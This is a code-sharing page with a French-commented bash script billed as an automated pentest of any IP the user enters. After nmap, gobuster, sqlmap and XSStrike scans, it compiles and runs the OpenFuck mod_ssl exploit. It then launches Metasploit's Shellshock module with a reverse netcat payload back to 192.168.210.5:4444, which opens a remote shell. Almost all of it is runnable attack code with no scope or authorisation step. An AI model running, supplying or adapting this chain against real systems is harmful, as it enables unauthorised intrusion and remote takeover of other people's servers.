Voici votre URL de partage https://sharemycode.io/c/0377e18 (Cliquer pour copier) (Copié)
#!/bin/bash
# Couleurs pour un affichage clair
GREEN='\033[0;32m'
RED='\033[0;31m'
NC='\033[0m' # Pas de couleur
# Demander l'IP cible
read -p "Entrez l'adresse IP de la cible (ex: 192.168.210.4) : " TARGET
echo -e "${GREEN}--- Début du pentest automatisé sur la cible : $TARGET ---${NC}"
# 1️⃣ Scanner les ports ouverts et services actifs
echo -e "${GREEN}[1/6] Scan des ports et services actifs...${NC}"
nmap -sV -A -p- $TARGET -oN nmap_scan.txt
echo -e "${GREEN}Résultats sauvegardés dans nmap_scan.txt${NC}"
# 2️⃣ Scanner les répertoires et fichiers cachés
echo -e "${GREEN}[2/6] Détection de fichiers cachés avec Gobuster...${NC}"
gobuster dir -u http://$TARGET -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt,log,sql -o gobuster_scan.txt
echo -e "${GREEN}Résultats sauvegardés dans gobuster_scan.txt${NC}"
# 3️⃣ Tester les vulnérabilités SQL
echo -e "${GREEN}[3/6] Test des injections SQL avec SQLMap...${NC}"
sqlmap -u "http://$TARGET/page.php?id=1" --batch --dbs --output-dir=sqlmap_results
echo -e "${GREEN}Résultats SQLMap sauvegardés dans sqlmap_results${NC}"
# 4️⃣ Tester les vulnérabilités XSS
echo -e "${GREEN}[4/6] Scan des failles XSS avec XSStrike...${NC}"
xsstrike -u "http://$TARGET" -o xsstrike_scan.txt
echo -e "${GREEN}Résultats sauvegardés dans xsstrike_scan.txt${NC}"
# 5️⃣ Vérifier et tenter les exploits Apache
echo -e "${GREEN}[5/6] Recherche d'exploits Apache...${NC}"
searchsploit apache > exploits_apache.txt
if grep -q "mod_ssl" exploits_apache.txt; then
echo -e "${RED}Vulnérabilité détectée sur Apache mod_ssl!${NC}"
searchsploit -m unix/remote/764.c
gcc 764.c -o openfuck -lssl -lcrypto
./openfuck 0x6b http://$TARGET
fi
# 6️⃣ Exploiter la cible avec Metasploit si possible
echo -e "${GREEN}[6/6] Tentative d'exploitation avec Metasploit...${NC}"
msfconsole -q -x "
use exploit/unix/http/apache_mod_cgi_bash_env_exec;
set RHOSTS $TARGET;
set TARGETURI /;
set PAYLOAD cmd/unix/reverse_netcat;
set LHOST 192.168.210.5;
set LPORT 4444;
exploit
"
echo -e "${GREEN}--- Pentest terminé ! 🚀 ---${NC}"
echo -e "📂 Résultats enregistrés dans :"
echo -e " - nmap_scan.txt"
echo -e " - gobuster_scan.txt"
echo -e " - sqlmap_results/"
echo -e " - xsstrike_scan.txt"
echo -e " - exploits_apache.txt"
Informations
Cet extrait a été créé le 22 janv. 2025 à 02:42:23
Cet extrait expire le 21 févr. 2025 à 02:42:23
Langage : bash
Link
Voici votre URL de partage : https://sharemycode.io/c/0377e18 Copié